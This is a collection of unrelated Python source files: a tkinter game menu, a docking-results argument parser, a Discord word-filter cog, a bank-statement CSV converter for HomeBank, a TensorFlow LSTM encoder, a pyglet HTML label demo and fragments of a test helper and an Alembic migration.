default_server='default_server' if default_server else '', wtf_prefix=wtf_prefix,
key_path=key_path, cert_path=cert_path)
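# A minimal usage sketch (paths and ports below are assumptions for illustration, not
# part of the test suite):
#
#   conf = construct_nginx_config(
#       nginx_root="/tmp/nginx", nginx_webroot="/tmp/webroot",
#       http_port=8080, https_port=8443, other_port=8081,
#       default_server=True, key_path="/tmp/key.pem", cert_path="/tmp/cert.pem")
#   with open("/tmp/nginx/nginx.conf", "w") as fh:
#       fh.write(conf)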
|
python
|
from tkinter import *
from tkinter import font
from tkinter import ttk
from importlib import reload
game_loadonce = False
def play():
global game
global menuApp, game_loadonce
menuApp.save_scores("leaderboard.txt")
menuApp.root.destroy()
if game_loadonce == False:
import game
game_loadonce = True
else:
reload(game)
menuApp = _menuApp()
menuApp.fnh_ttl.configure(text="Score: "+str(game.score))
menuApp.getname1()
class _menuApp():
def sortf(self, scr):
i2 = 0
for i in range(len(scr), 0, -1):
if scr[i:i+2] == '- ':
i2 = i
break
i2 += 2
return -int(scr[i2:])
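    # Hedged illustration (not in the original): sortf parses "name - score" entries and
    # returns the negated score so list.sort() puts the highest score first, e.g.
    #   self.sortf("Alice - 120")  ->  -120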
def load_scores(self, fname):
try:
file = open(fname, mode='r')
except FileNotFoundError:
file = open(fname, 'a')
file.close()
return
for line in file.readlines():
line = line.strip()
self.scores.append(line)
self.scores.sort(key=self.sortf)
file.close()
def save_scores(self, fname):
file = open(fname, mode='w')
for line in self.scores:
file.write(line+'\n')
file.close()
def update_scores(self, name=None, score=None):
if name != None and score != None:
msg = name+' - '+str(score)
self.scores.append(msg)
self.scores.sort(key=self.sortf)
self.scr_lst_v.set(value=self.scores)
self.save_scores("leaderboard.txt")
def quit(self):
self.destroyed = True
self.root.quit()
def leaderboard(self, prev_f):
prev_f.place_forget()
self.main.place_forget()
self.ldr_brd.place(x=0, y=0)
def mainmenu(self, prev_f):
prev_f.place_forget()
self.main.place(x=0, y=0)
def getname1(self):
self.main.place_forget()
self.finish.place(x=0, y=0)
def getname2(self):
self.finish.place_forget()
self.main.place(x=0, y=0)
if menuApp.txtname.get() == '':
menuApp.txtname.set('Anonymous')
menuApp.update_scores(menuApp.txtname.get(), game.score)
def __init__(self):
self.rescr = (512, 512)
self.root = Tk()
self.root.title("SPACE ATTXK")
self.root.geometry(str(self.rescr[0]) + 'x' + str(self.rescr[1]))
self.root.resizable(False, False)
self.font1 = font.Font(family='Arial', size=24)
self.font2 = font.Font(family='Arial', size=12)
self.s = ttk.Style()
self.s.configure('TButton', font=self.font2)
self.main = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.main.columnconfigure(0, weight=1)
self.main.columnconfigure(3, weight=1)
self.main.rowconfigure(0, weight=1)
self.main.rowconfigure(6, weight=1)
self.main.grid_propagate(0)
self.main.place(x=0, y=0)
self.title = ttk.Label(
self.main, text="SPACE ATTXCK", font=self.font1, padding=32)
self.title.grid(row=1, column=0, columnspan=4)
self.strt_btn = ttk.Button(self.main, text="Play", command=play)
self.strt_btn.grid(row=2, column=2, sticky=S+E+W)
self.ldr_btn = ttk.Button(
self.main, text="Leaderboard", command=lambda: self.leaderboard(self.main))
self.ldr_btn.grid(row=3, column=2, sticky=N+E+S+W)
self.settings = ttk.Button(
self.main, text="Exit", command=lambda: exit())
self.settings.grid(row=4, column=2, sticky=N+E+W)
ctl_txt = "Controls:\nJump - Space\n Fire - Enter\nEscape - Pause Game"
self.controls = ttk.Label(
self.main, text=ctl_txt, font=self.font2, justify=CENTER, padding=32)
self.controls.grid(row=5, column=2, sticky=N+E+W)
self.scores = []
self.scr_lst_v = StringVar(value=self.scores)
self.load_scores("leaderboard.txt")
self.update_scores()
self.ldr_brd = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.ldr_brd.columnconfigure(0, weight=1)
self.ldr_brd.columnconfigure(3, weight=1)
# self.ldr_brd.rowconfigure(0,weight=1)
self.ldr_brd.grid_propagate(0)
self.ldr_ttl = ttk.Label(
self.ldr_brd, text="Leaderboard", font=self.font1, padding=32, justify=CENTER)
self.ldr_ttl.grid(row=1, column=2)
self.ldr_lst = Listbox(self.ldr_brd, listvariable=self.scr_lst_v,
height=10, selectmode='browse', font=self.font2)
self.ldr_lst.grid(row=2, column=2, padx=16, pady=16)
self.ldr_exit = ttk.Button(
self.ldr_brd, text="Main Menu", command=lambda: self.mainmenu(self.ldr_brd))
self.ldr_exit.grid(row=3, column=2)
self.finish = ttk.Frame(
self.root, width=self.rescr[0], height=self.rescr[1])
self.finish.rowconfigure(0, weight=1)
self.finish.rowconfigure(5, weight=1)
self.finish.columnconfigure(1, weight=1)
self.finish.columnconfigure(3, weight=3)
self.finish.grid_propagate(0)
self.txtname = StringVar()
self.fnh_ttl = ttk.Label(self.finish, text="",
font=self.font1, justify=CENTER)
self.fnh_ttl.grid(row=1, column=2, padx=16, pady=16)
self.fnh_lbl1 = ttk.Label(
self.finish, text="Enter name:", font=self.font2, justify=CENTER)
self.fnh_lbl1.grid(row=3, column=1, padx=16)
self.fnh_txtin = ttk.Entry(
self.finish, font=self.font2, justify=CENTER, textvariable=self.txtname)
self.fnh_txtin.grid(row=3, column=2)
self.fnh_btn = ttk.Button(
self.finish, text="OK", command=self.getname2)
self.fnh_btn.grid(row=4, column=2, padx=16, pady=16)
menuApp = _menuApp()
menuApp.root.mainloop()
|
python
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import getopt
import os
import sys
import re
from .debug import Debug
from .debug import BColors
from subprocess import Popen, PIPE
from multiprocessing import cpu_count
class InputParams(object):
def __init__(self, cfg, argv):
self.PROG_OPT_RE = re.compile(r'^([A-Z\d]+)[_-](?:([A-Z\d]+)[_-])?')
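        # Hedged example (assumed input naming, for illustration only): a result folder
        # named like "VS_LS_target" would match with group(1) == "VS" (technique/option)
        # and group(2) == "LS" (software), mirroring how the groups are read further down.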
self.cfg = cfg
self.argv = argv
        self.TAG = "InputParams"
self.color = BColors.GREEN
self.get_input_params()
def get_input_params(self):
if len(self.argv) == 1:
self.cfg.print_format_help("Mandatory options:", "")
self.cfg.print_format_help("-i", "result folder genereted by MetaScreener")
self.cfg.print_format_help("-p", "Original target")
self.cfg.print_format_help("--pdb", "Original target in pdb format")
self.cfg.print_format_help("-l", "Original query")
print("")
self.cfg.print_format_help("Optional options:", "")
self.cfg.print_format_help("--cores", "Maximum number of cores; Use 0 for autodetect; Default: 1")
self.cfg.print_format_help("--profile", "webBD STANDARD_BD STANDARD_VS")
self.cfg.print_format_help("--prog", "Software")
self.cfg.print_format_help("--opt", "opt")
self.cfg.print_format_help("-c", "cut-off of energies; Default: 0")
self.cfg.print_format_help("-z", "Clustering only for BD; Deafult: y")
self.cfg.print_format_help("-s", "Generate poseview; Deafult: y")
self.cfg.print_format_help("-t", "Generate plip interactions; Deafult: y")
self.cfg.print_format_help("-f", "If folder exits don't overwrite; Deafult: y")
self.cfg.print_format_help("-a", "Generate pymol sessions with plip;"
"Deafult: n")
self.cfg.print_format_help("--rb", "Number of files saved as bestScore in VS. Default(50)")
self.cfg.print_format_help("--rf", "Number of files saved in VS. Default (500)")
self.cfg.print_format_help("-b", "Chain of residues split by ':', type cad_res_num, "
" For example A_TYR_385:A_VAL_434:A_VAL_5")
self.cfg.print_format_help("-e", "ONLY BD; calcula la distancia entre el centro del ligando original y el"
" centro del ligando "
"de docking; Deafult: n")
self.cfg.print_format_help("-d", "Debug level; Deafult: 0 (off)")
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y -z clusterizado y"
% sys.argv[0] + "\n")
exit()
print("Using {} core{} for procesing results.".format(self.cfg.cores, 's' if self.cfg.cores > 1 else ''))
# Read command line args
myopts, args = getopt.getopt(self.argv[1:], "i:p:l:c:s:z:t:d:k:f:a:b:r:e:",
["cores=", "prog=", "opt=", "profile=", "flex", "rb=", "rf=", "pdb="])
for o, a in myopts:
if o == '--profile':
self.cfg.use_profile = a.upper()
if self.cfg.use_profile:
self.cfg.set_profile_cfg(self.cfg.use_profile)
for o, a in myopts:
if o == '-i':
self.cfg.file_input = os.path.realpath(a if a.endswith('/') else "{}/".format(a))
elif o == '-p':
self.cfg.file_target = a
elif o == '--pdb':
self.cfg.file_target_pdb = a
elif o == '-c':
self.cfg.engCorte = float(a)
elif o == '-l':
self.cfg.file_query = a
elif o == '-s':
self.cfg.poseview = a
elif o == '-z':
self.cfg.clusterizado = a
elif o == '-d':
self.cfg.mode_debug = a
elif o == '-a':
self.cfg.plip = a
elif o == '-f':
self.cfg.createFolder = a
elif o == '-e':
self.cfg.distanceLigs = a
elif o == '-b':
aux = a.split(":")
for i in aux:
self.cfg.resnPoseviewDetct.append(i)
elif o == '--flex':
self.cfg.flexible = True
elif o == '--cores':
self.cfg.cores = int(a)
max_cores = cpu_count()
if self.cfg.cores == 0 or self.cfg.cores > max_cores:
self.cfg.cores = max_cores
elif self.cfg.cores < 0:
self.cfg.cores = 1
elif o == '--profile':
self.cfg.use_profile = a.upper()
elif o == '--prog':
self.cfg.programa = a.upper()
elif o == '--opt':
if not self.cfg.use_profile:
self.cfg.opcion = a.upper()
elif o == '--rb':
self.cfg.resultados_best_score = int(a)
elif o == '--rf':
self.cfg.resultados_ficheros = int(a)
else:
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y "
"-z clusterizado y -t inteacciones y -d debug [0-10]" % sys.argv[0] + "\n")
exit()
self.cfg.debug = Debug(self.cfg.mode_debug)
self.cfg.file_target = os.path.realpath(self.cfg.file_target)
if self.cfg.file_target_pdb:
self.cfg.file_target_pdb = os.path.realpath(self.cfg.file_target_pdb)
self.cfg.file_query = os.path.realpath(self.cfg.file_query)
self.cfg.file_input = os.path.realpath(self.cfg.file_input)
# Get compounds names and input path
self.cfg.extract_names()
if not self.cfg.file_target or not os.path.exists(self.cfg.file_target):
print("Target(s) not indicated(s), aborting.")
exit()
elif not self.cfg.file_query or not os.path.exists(self.cfg.file_query):
print("Query(s) not found, aborting.")
exit()
elif not self.cfg.file_input or not os.path.exists(self.cfg.file_input):
print("Path of docking results not found, aborting.")
exit()
self.cfg.print_format("Input files:", "", "")
self.cfg.print_format("", "Query: ", self.cfg.file_target)
self.cfg.print_format("", "Ligands: ", self.cfg.file_query)
self.cfg.print_format("", "Directory MetaScreener: ", self.cfg.file_input + "/")
#
# Test folders
#
self.cfg.SHUTTLEMOL_DIRS = self.cfg.perfiles.get_folders()
self.cfg.OUTPUT_DIRS = self.cfg.perfiles.get_out_folders()
self.cfg.OUTPUT_GRAPHS = self.cfg.perfiles.get_files_out()
self.cfg.ext_query = os.path.splitext(self.cfg.file_query)[1].strip()
self.cfg.ext_target = os.path.splitext(self.cfg.file_target)[1].strip()
comando = ("find " + self.cfg.file_input + "/" + self.cfg.SHUTTLEMOL_DIRS[
'folderMolec'] + "/ ")
aux = self.cfg.execute(self.TAG, comando)
aux = aux.split("\n")
if os.path.isdir(aux[0]):
del aux[0]
self.cfg.extLigand = str(os.path.splitext(aux[0])[1]).strip()
self.cfg.print_format("", "Ext Prot: ", self.cfg.ext_target)
self.cfg.print_format("", "Ext Lig: ", self.cfg.ext_query)
if self.cfg.mode_debug:
debug = Debug(self.cfg.mode_debug)
for i in self.cfg.SHUTTLEMOL_DIRS:
debug.show(self.TAG + " metascreener Dirs: " + i, self.color)
for i in self.cfg.OUTPUT_DIRS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_DIRS[i], self.color)
for i in self.cfg.OUTPUT_GRAPHS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_GRAPHS[i]['outPut'], self.color)
if not self.cfg.programa or not self.cfg.opcion:
match = self.PROG_OPT_RE.match(self.cfg.nameEntrada)
if match and len(match.group()) > 1:
self.cfg.programa = match.group(2).strip()
self.cfg.opcion = match.group(1).strip()
else:
print("The program or the option could not be determined, aborting ")
exit()
self.cfg.print_format("\nTest data:", "", "")
self.cfg.print_format("", "Software: ", self.cfg.programa)
self.cfg.print_format("", "Technique: ", self.cfg.opcion)
self.cfg.print_format("", "Molecules:", str(len(aux)) + "\n")
|
python
|
"""Test."""
import unittest
class TestX(unittest.TestCase):
"""Tests."""
def test_f(self):
"""Test."""
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
|
python
|
import discord
from redbot.core import Config, commands, checks
class Automod(commands.Cog):
"""Automoderation commands"""
def __init__(self):
self.config = Config.get_conf(self, identifier=1234567890)
watching = list()
self.config.init_custom("ChannelsWatched", 1)
self.config.register_custom("ChannelsWatched", **watching)
blacklisted_words = list()
self.config.init_custom("BlacklistedWords", 1)
self.config.register_custom("BlacklistedWords", **blacklisted_words)
@commands.group(name='automod')
async def automod(self, ctx):
pass
@automod.command(name='watch')
@commands.admin()
async def watch(self, ctx, channel: discord.TextChannel):
await self.config.custom("ChannelsWatched").watching().append(channel)
await ctx.send(f'Watching {channel.name}')
@automod.command(name='unwatch')
@commands.admin()
async def unwatch(self, ctx, channel: discord.TextChannel):
watching = await self.config.custom("ChannelsWatched").watching()
del watching[channel]
await ctx.send(f'Stopped watching {channel.name}')
@automod.command(name='block')
@commands.admin()
    async def block(self, ctx, word: str):
await self.config.custom("BlacklistedWords").blacklisted_words.append(word)
await ctx.send(f'Blocked `{word}`')
@automod.command(name='unblock')
@commands.admin()
    async def unblock(self, ctx, word: str):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
del blacklisted[word]
await ctx.send(f'Unblocked `{word}`')
@automod.command(name='listblocked')
async def listblocked(self, ctx):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
await ctx.send(f'```{str(blacklisted)}```')
@commands.Cog.listener()
async def on_message(self, message):
watching_channels = await self.config.custom("ChannelsWatched").watching()
blacklisted_words = await self.config.custom("BlacklistedWords").blacklisted_words()
        if message.channel not in watching_channels:
return
for word in blacklisted_words:
            if word in message.content:
await message.delete()
|
python
|
#!/usr/bin/env python3
import argparse
import xlrd
from datetime import datetime
import pandas as pd
import os
import shutil
import configparser
config = configparser.ConfigParser()
config.read("config.ini")
unixFilesPath = os.getcwd() + config["FilePaths"]["unixFilesPath"]
unixConvertedPath = os.getcwd() + config["FilePaths"]["unixConvertedPath"]
windowsFilesPath = os.getcwd() + config["FilePaths"]["windowsFilesPath"]
windowsConvertedPath = os.getcwd() + config["FilePaths"]["windowsConvertedPath"]
user = config["User"]["username"]
homeBankCols = config["HomeBank"]["homeBankCols"].split(sep=",")
amexHeaders = config["CSVHeaders"]["amexHeaders"].split(sep=",")
boaCAHeaders = config["CSVHeaders"]["boaCAHeaders"].split(sep=",")
boaCCHeaders = config["CSVHeaders"]["boaCCHeaders"].split(sep=",")
earnestHeaders = config["CSVHeaders"]["earnestHeaders"].split(sep=",")
vanguardRothHeaders = config["CSVHeaders"]["vanguardRothHeaders"].split(sep=",")
vanguard401KHeaders = config["CSVHeaders"]["vanguard401KHeaders"].split(sep=",")
venmoHeaders = config["CSVHeaders"]["venmoHeaders"].split(sep=",")
paypalHeaders = config["CSVHeaders"]["paypalHeaders"].split(sep=",")
def amexCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == amexHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
        if pd.notna(row["Amount"]):
data.append([row["Date"], None, None, row["Description"], None,
-1*row["Amount"],
None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/amexHomeBank.csv", index=False, sep=";")
def boaCAConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=5)
if all(inputDataDict.columns == boaCAHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Date"], None, None, row["Description"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCAHomeBank.csv", index=False, sep=";")
def boaCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == boaCCHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Posted Date"], None, row["Reference Number"], row["Payee"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCCHomeBank.csv", index=False, sep=";")
def earnestConversion(filename):
inputDataDict = pd.read_html(io=filename)[0]
try:
if all(inputDataDict.columns == earnestHeaders):
inputDataDict = pd.read_html(io=filename)[0].to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
# Just the loan
data.append([row["Date"], None, None, user, None,
row["Total"][2:],
"Loan Payment", None])
# Just the interest
data.append([row["Date"], None, None, "Earnest", None,
"-" + row["Interest"][2:],
"Loan Interest", None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/earnestHomeBank.csv", index=False, sep=";")
def vanguardRothConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=3)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguardRothHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguardRothLogic(row["Transaction Type"]):
data.append([row["Settlement Date"], 0, row["Transaction Description"], "Vanguard",
None, row["Principal Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguardRothHomeBank.csv", index=False, sep=";")
def vanguardRothLogic(rowType):
if rowType == "Dividend":
return True
elif rowType == "Contribution":
return True
elif rowType == "Capital gain (LT)":
return True
elif rowType == "Capital gain (ST)":
return True
else:
return False
def vanguard401KConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=16)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguard401KHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguard401KLogic(row["Transaction Description"]):
data.append([
row["Run Date"], None, row["Transaction Description"],
"Vanguard", None, row["Dollar Amount"], None, row["Investment Name"]
])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguard401KHomeBank.csv", index=False, sep=";")
def vanguard401KLogic(rowType):
if rowType == "Plan Contribution":
return True
elif rowType == "Dividends on Equity Investments":
return True
else:
return False
def venmoConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=0)
inputDataDict["Datetime"] = pd.to_datetime(inputDataDict["Datetime"],format="%Y-%m-%dT%H:%M:%S")
if all(inputDataDict.columns == venmoHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount (total)"]):
data.append([
row["Datetime"].strftime("%m/%d/%Y"),
None, row["Note"],
venmoLogic(row),
"Venmo " + row["Type"],
row["Amount (total)"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/venmoHomeBank.csv", index=False, sep=";")
def paypalConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == paypalHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount"]):
data.append([
row["Date"],
None, row["Type"],
row["Name"] if pd.notnull(
row["Name"]) else paypalLogic(row["Type"]),
None, row["Amount"], None, None])
if len(data) == 0:
raise Exception()
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/paypalHomeBank.csv", index=False, sep=";")
def paypalLogic(type_name):
if type_name == "General Credit Card Deposit":
return "Paypal"
else:
return None
def init():
try:
os.mkdir("files")
os.mkdir("convertedfiles")
print("Init success")
except:
print("Init failed")
def runAll():
print("Running all possible conversions")
cwd = ""
try:
if os.name == "nt":
fileList = os.listdir(windowsFilesPath)
cwd = windowsFilesPath + "\\"
else:
fileList = os.listdir(unixFilesPath)
cwd = unixFilesPath + "/"
except:
raise Exception
for file in fileList:
filePath = cwd + file
try:
amexCCConversion(filePath)
print(file + " is amexCC")
except:
print(file + " is not amexCC")
try:
boaCAConversion(filePath)
print(file + " is boaCA")
except:
print(file + " is not boaCA")
try:
boaCCConversion(filePath)
print(file + " is boaCC")
except:
print(file + " is not boaCC")
try:
earnestConversion(filePath)
print(file + " is earnest")
except:
print(file + " is not earnest")
try:
vanguardRothConversion(filePath)
print(file + " is vanguardRoth")
except:
print(file + " is not vanguardRoth")
try:
vanguard401KConversion(filePath)
print(file + " is vanguard401k")
except:
print(file + " is not vanguard401k")
try:
venmoConversion(filePath)
print(file + " is venmo")
except:
print(file + " is not venmo")
try:
paypalConversion(filePath)
print(file + " is paypal")
except:
print(file + " is not paypal")
def clean():
try:
if os.name == "nt":
shutil.rmtree(windowsFilesPath)
shutil.rmtree(windowsConvertedPath)
else:
shutil.rmtree(unixFilesPath)
shutil.rmtree(unixConvertedPath)
print("Directories have been removed")
except:
print("Directories were not cleaned")
def venmoLogic(row):
if row["Type"] == "Charge":
return row["To"]
elif row["Type"] == "Standard Transfer":
return user
elif row["Type"] == "Payment":
return row["From"]
else:
return None
def main():
parser1 = argparse.ArgumentParser(add_help=False,
description="Convert data files from online banking sites to Homebank compatible CSV formats. Default is to run all")
parser1.add_argument("--clean", action="store_true",
help="deletes the \'convertedfiles\' and \'files\' directories and its contents")
parser1.add_argument("--init", action="store_true",
help="initialize the directories by creating the \'convertedfiles\' and \'files\' directories ")
parser2 = argparse.ArgumentParser(parents=[parser1])
group = parser2.add_mutually_exclusive_group()
group.add_argument("--amex", nargs=1,
help="convert an American Express credit card account CSV file",)
group.add_argument("--boaCA", nargs=1,
help="convert a Bank of America checking account CSV file")
group.add_argument("--boaCC", nargs=1,
help="convert a Bank of America credit card CSV file")
group.add_argument("--earnest", nargs=1,
help="convert an Earnest xlsx file")
group.add_argument("--venmo", nargs=1,
help="convert a Venmo csv file")
group.add_argument("--vRoth", nargs=1,
help="convert a Vanguard Roth csv file")
group.add_argument("--v401k", nargs=1,
help="convert a Vanguard 401K csv file")
group.add_argument("--paypal", nargs=1,
help="convert a Paypal csv file")
args = parser2.parse_args()
if args.clean:
clean()
elif args.init:
init()
elif args.amex:
amexCCConversion(args.amex[0])
print("AMEX file converted. Output file: amexHomeBank.csv")
elif args.boaCA:
boaCAConversion(args.boaCA[0])
print("BOA CA file converted. Output file: boaHomeBank.csv")
elif args.boaCC:
boaCCConversion(args.boaCC[0])
print("BOA CC file converted. Output file: boaHomeBank.csv")
elif args.earnest:
earnestConversion(args.earnest[0])
print("Earnest file converted. Output file: earnestHomeBank.csv")
elif args.venmo:
venmoConversion(args.venmo[0])
print("Venmo file converted. Output file: venmoHomeBank.csv")
elif args.vRoth:
vanguardRothConversion(args.vRoth[0])
print("Vanguard Roth file converted. Output file: vanguardRothHomeBank.csv")
elif args.v401k:
vanguard401KConversion(args.v401k[0])
print("Vanguard 401k file converted. Output file: vanguard401kHomeBank.csv")
elif args.paypal:
paypalConversion(args.paypal[0])
print("Paypal file converted. Output file: paypalHomeBank.csv")
else:
runAll()
if __name__ == "__main__":
main()
|
python
|
#-*- coding:utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=import-error, too-few-public-methods, too-many-locals
# pylint: disable=too-many-arguments, too-many-instance-attributes, invalid-name
"""
lstm_encoder.py: the implementation of lstm ctc
"""
__author__ = "Kyungmin Lee"
__email__ = "[email protected]"
import math
import tensorflow as tf
import tfsr.helper.model_helper as mh
from tfsr.model.sequence_router import CapsulationLayer
class LstmEncoder(tf.keras.Model): #pylint: disable=too-many-ancestors
"""
An implementation of LSTM based speech encoders.
"""
def get_config(self):
pass
def __init__(self, config, vocab_n):
super().__init__()
self.mask = tf.keras.layers.Lambda(mh.feat_mask2, name="pad_mask")
num_layers = config.model_encoder_num
d_model = config.model_dimension
input_dropout = config.train_inp_dropout
inner_dropout = config.train_inn_dropout
init = config.model_initializer
self.d_model = d_model
self.num_layers = num_layers
if config.model_type.lower() == "blstm":
self.enc_layers = [tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(
d_model, return_sequences=True, kernel_initializer=mh.get_init(
init)), merge_mode="ave") for _ in range(num_layers)]
else:
self.enc_layers = \
[tf.keras.layers.LSTM(d_model, return_sequences=True,
kernel_initializer=mh.get_init(init))
for _ in range(num_layers)]
self.layernorms = [tf.keras.layers.LayerNormalization(epsilon=1e-6)
for _ in range(num_layers)]
self.dropouts = [tf.keras.layers.Dropout(rate=inner_dropout)
for _ in range(num_layers)]
self.ln = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.mask_layer = tf.keras.layers.Masking(mask_value=0.0)
self.input_dropout = tf.keras.layers.Dropout(rate=input_dropout)
self.proj = tf.keras.layers.Dense(
vocab_n, kernel_initializer=mh.get_init(init), use_bias=False)
kernel_size = 3
self.stride = stride = config.model_conv_stride
self.cnn_n = cnn_n = config.model_conv_layer_num
self.feat_dim = math.ceil(config.feat_dim / (stride ** cnn_n))
self.nfilt = nfilt = config.model_conv_filter_num
self.conv = CapsulationLayer(cnn_n, nfilt, kernel_size, self.stride, init,
name="conv_feat") \
if config.model_lstm_is_cnnfe else None
self.in_len_div = stride ** cnn_n if config.model_lstm_is_cnnfe else 1
def call(self, embeddings, **kwargs):
# pylint: disable=arguments-differ
inp_len = kwargs["input_lengths"]
training = kwargs["training"]
if self.conv is not None:
embeddings, batch, seq_len = self.conv(embeddings, input_lengths=inp_len)
embeddings = tf.reshape(embeddings,
[batch, seq_len, self.feat_dim * self.nfilt],
name="reshape_conv")
embeddings = self.input_dropout(embeddings, training=training)
for idx, enc_layer in enumerate(self.enc_layers):
embeddings = enc_layer(embeddings)
embeddings = self.layernorms[idx](embeddings)
embeddings = self.dropouts[idx](embeddings, training=training)
embeddings = self.proj(embeddings)
embeddings = self.mask([embeddings, inp_len, self.in_len_div])
embeddings = self.mask_layer(embeddings)
return self.ln(embeddings)
|
python
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple demonstration of the HTMLLabel class, as it might be used on a
help or introductory screen.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import os
import pyglet
html = '''
<h1>HTML labels in pyglet</h1>
<p align="center"><img src="pyglet.png" /></p>
<p>HTML labels are a simple way to add formatted text to your application.
Different <font face="Helvetica,Arial" size=+2>fonts</font>, <em>styles</em>
and <font color=maroon>colours</font> are supported.
<p>This window has been made resizable; text will reflow to fit the new size.
'''
window = pyglet.window.Window(resizable=True)
location = pyglet.resource.FileLocation(os.path.dirname(__file__))
label = pyglet.text.HTMLLabel(html, location=location,
width=window.width,
multiline=True, anchor_y='center')
@window.event
def on_resize(width, height):
# Wrap text to the width of the window
label.width = window.width
# Keep text vertically centered in the window
label.y = window.height // 2
@window.event
def on_draw():
window.clear()
label.draw()
pyglet.gl.glClearColor(1, 1, 1, 1)
pyglet.app.run()
|
python
|
"""Replace block with 'lock'
Revision ID: 8192b68b7bd0
Revises: 3176777cd2bb
Create Date: 2021-01-20 20:48:40.867104
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = "8192b68b7bd0"
down_revision = "3176777cd2bb"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
